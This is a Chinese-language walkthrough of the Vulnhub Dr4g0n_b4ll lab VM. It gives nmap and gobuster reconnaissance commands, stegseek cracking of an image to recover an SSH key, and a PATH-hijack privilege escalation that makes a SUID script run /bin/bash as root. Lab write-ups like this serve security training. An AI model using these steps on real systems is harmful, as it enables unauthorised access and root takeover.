【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)

【Vulnhub系列靶场】Vulnhub_Dr4g0n_b4ll靶场渗透

原文转载已经过授权

原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境搭建

选择打开.ovf 文件

配置名称和路径

打开后调整网络连接模式为【NAT】即可

二、信息收集

1、主机发现

nmap.exe -sn 192.168.31.*

2、端口扫描

1、快速粗略的端口扫描

nmap.exe -F 192.168.31.65

2、详细端口扫描

nmap.exe -sT --min-rate 10000 -p- 192.168.31.65
nmap.exe -sU --min-rate 10000 -p- 192.168.31.65

3、详细扫描和漏洞探测

nmap.exe -sV -A -p22,80 192.168.31.65
nmap.exe --script=vuln -p22,80 192.168.31.65

只发现了一个robots.txt 的文件

3、web 目录探测

gobuster.exe dir -u http://192.168.31.65 -w d:\theperson\dirs\dicc.txt -b 404,403 --no-error

4、web 框架探测

whatweb http://192.168.31.65

三、获取shell立足点

1、查看敏感信息

1、主页

2、robots.txt 文件

进行base64解码:

3、源代码


2、DRAGON BALL目录信息

1、secret.txt 文件

保存下来做目录爆破

并无收获

2、Vulnhub 目录

3、Vulnhub/login.html:是一个虚假的登录页面

4、aj.jpg:一张黑客的图片

3、图片信息提取

提取图片隐写信息

stegseek aj.jpg /usr/share/wordlists/rockyou.txt

4、获取shell 立足点

此时拿到一个ssh密钥,欠缺用户名,此处的xmen 是用户名

我们直接用密钥进行登录

ssh xmen@192.168.31.65 -i id_rsa

成功拿到shell

四、提权至root

1、查看敏感文件

shell 是一个suid权限,发现可以执行环境变量中的ps 命令,那么可以尝试用环境变量劫持来提权

2、提权至root

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd ~/script
./script

原文转载已经过授权

更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

相关推荐
不爱缺氧i3 分钟前
dvwa靶场
安全
小蜗牛慢慢爬行34 分钟前
有关异步场景的 10 大 Spring Boot 面试问题
java·开发语言·网络·spring boot·后端·spring·面试
MARIN_shen39 分钟前
Marin说PCB之POC电路layout设计仿真案例---06
网络·单片机·嵌入式硬件·硬件工程·pcb工艺
m0_748240021 小时前
Chromium 中chrome.webRequest扩展接口定义c++
网络·c++·chrome
終不似少年遊*1 小时前
华为云计算HCIE笔记05
网络·华为云·云计算·学习笔记·hcie·认证·hcs
星竹2 小时前
upload-labs-master第21关超详细教程
网络安全
蜜獾云2 小时前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
虹科数字化与AR3 小时前
安宝特应用 | 美国OSHA扩展Vuzix AR眼镜应用,强化劳动安全与效率
安全·ar·远程协助
小林熬夜学编程3 小时前
【Linux网络编程】第十四弹---构建功能丰富的HTTP服务器:从状态码处理到服务函数扩展
linux·运维·服务器·c语言·网络·c++·http
Hacker_Fuchen3 小时前
天融信网络架构安全实践
网络·安全·架构